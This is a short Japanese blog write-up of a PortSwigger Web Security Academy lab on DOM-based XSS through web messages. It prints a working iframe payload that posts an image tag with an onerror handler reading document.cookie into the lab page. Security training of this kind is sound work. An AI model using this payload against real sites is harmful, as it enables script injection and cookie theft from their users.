Shikata Ga Nai

Private? There is no such things.

DOM XSS using web messagesをやってみた

PortSwigger

Hello there, ('ω')ノ

 

Webメッセージを使用するDOMXSSを。

 

WebメッセージをリッスンするaddEventListenerが確認できて。

「addEventListener()」は、JavaScriptからさまざまなイベント処理を実行できて。

 

まずは、下記にアクセスして。

 https://aca01f2c1ee41512805864ec009e00a1.web-security-academy.net/

 

f:id:ThisIsOne:20210319080153p:plain

 

エクスプロイトサーバにページを読み込んで、エラーを発生させて。

スクリプトを実行するように仕掛けて。

 

<iframe src="https://aca01f2c1ee41512805864ec009e00a1.web-security-academy.net/" onload="this.contentWindow.postMessage('<img src=1 onerror=alert(document.cookie)>','*')" width="1000px" height="800px">

 

f:id:ThisIsOne:20210319080550p:plain

 

クリアできた。

 

f:id:ThisIsOne:20210319080612p:plain

 

ちなみにView exploitをクリックしてみると。

初めのページからといったメッセージが。

 

f:id:ThisIsOne:20210319080804p:plain

 

Best regards, (^^ゞ